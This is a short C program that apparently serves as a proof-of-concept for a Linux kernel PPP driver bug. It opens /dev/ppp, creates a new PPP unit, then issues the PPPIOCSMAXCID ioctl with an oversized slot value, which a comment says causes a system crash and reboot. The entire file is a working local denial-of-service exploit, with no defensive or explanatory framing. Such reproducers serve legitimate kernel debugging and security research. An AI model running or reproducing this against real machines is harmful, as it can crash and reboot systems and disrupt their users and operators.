#include <linux/types.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>

#define _IOC_NRBITS	8
#define _IOC_TYPEBITS	8
#ifndef _IOC_SIZEBITS
# define _IOC_SIZEBITS	14
#endif

#ifndef _IOC_DIRBITS
# define _IOC_DIRBITS	2
#endif

#define _IOC_NRMASK	((1 << _IOC_NRBITS)-1)
#define _IOC_TYPEMASK	((1 << _IOC_TYPEBITS)-1)
#define _IOC_SIZEMASK	((1 << _IOC_SIZEBITS)-1)
#define _IOC_DIRMASK	((1 << _IOC_DIRBITS)-1)

#define _IOC_NRSHIFT	0
#define _IOC_TYPESHIFT	(_IOC_NRSHIFT+_IOC_NRBITS)
#define _IOC_SIZESHIFT	(_IOC_TYPESHIFT+_IOC_TYPEBITS)
#define _IOC_DIRSHIFT	(_IOC_SIZESHIFT+_IOC_SIZEBITS)

#ifndef _IOC_NONE
# define _IOC_NONE	0U
#endif

#ifndef _IOC_WRITE
# define _IOC_WRITE	1U
#endif

#ifndef _IOC_READ
# define _IOC_READ	2U
#endif

#define _IOC(dir,type,nr,size) \
	(((dir)  << _IOC_DIRSHIFT) | \
	 ((type) << _IOC_TYPESHIFT) | \
	 ((nr)   << _IOC_NRSHIFT) | \
	 ((size) << _IOC_SIZESHIFT))

#ifndef __KERNEL__
#define _IOC_TYPECHECK(t) (sizeof(t))
#endif

#define _IO(type,nr)		_IOC(_IOC_NONE,(type),(nr),0)
#define _IOR(type,nr,size)	_IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
#define _IOW(type,nr,size)	_IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
#define _IOWR(type,nr,size)	_IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))

#define	PPPIOCSMAXCID	_IOW('t', 81, int)	/* set VJ max slot ID */
#define PPPIOCNEWUNIT	_IOWR('t', 62, int)	/* create new ppp unit */

int open_with_fopen(const char *filename, int flags)
{
	FILE *file;
	int fd = -1;
	char mode[3]="   ";

	switch (flags) {
	case O_RDONLY:  mode[0] = 'r';
			mode[1] = 0;
			break;
	case O_WRONLY:  mode[0] = 'w';
			mode[1] = 0;
			break;
	case O_RDWR:    mode[0] = 'w';
			mode[1] = '+';
			mode[2] = 0;
			break;
	}

	file = fopen(filename, mode);
	if (file)
		fd = fileno(file);

	return fd;
}
int main(void)
{
	int fd;
	int ret;
	unsigned int cmd;
	long arg;

	fd = open_with_fopen("/dev/ppp",O_RDWR);
	if(fd == -1){
		printf("[-] Open ppp device failed (%d - %s)\n", errno, strerror(errno));
		return -1;
	}

	/* create new ppp unit */
	cmd = PPPIOCNEWUNIT;
	arg = -1;		/* Set arg < 0 */
	ret = ioctl(fd,cmd, &arg);//syscall(nr, a1, a2, a3, a4,a5,a6);
	if(ret == -1){
		printf("[-] Ioctl failed (%d - %s)\n", errno, strerror(errno));
	}else{
		printf("[-]Ioctl ret (%d)\n", ret);
	}

	/* set VJ max slot ID: This cause a system crash reboot */
	cmd= PPPIOCSMAXCID;
	arg = 0x67084000;	
	ret = ioctl(fd,cmd, &arg);
	if(ret == -1){
		printf("[-] Ioctl failed (%d - %s)\n", errno, strerror(errno));
	}else{
		printf("[-] Ioctl ret (%d)\n", ret);
	}

	close(fd);
	return 0;
}

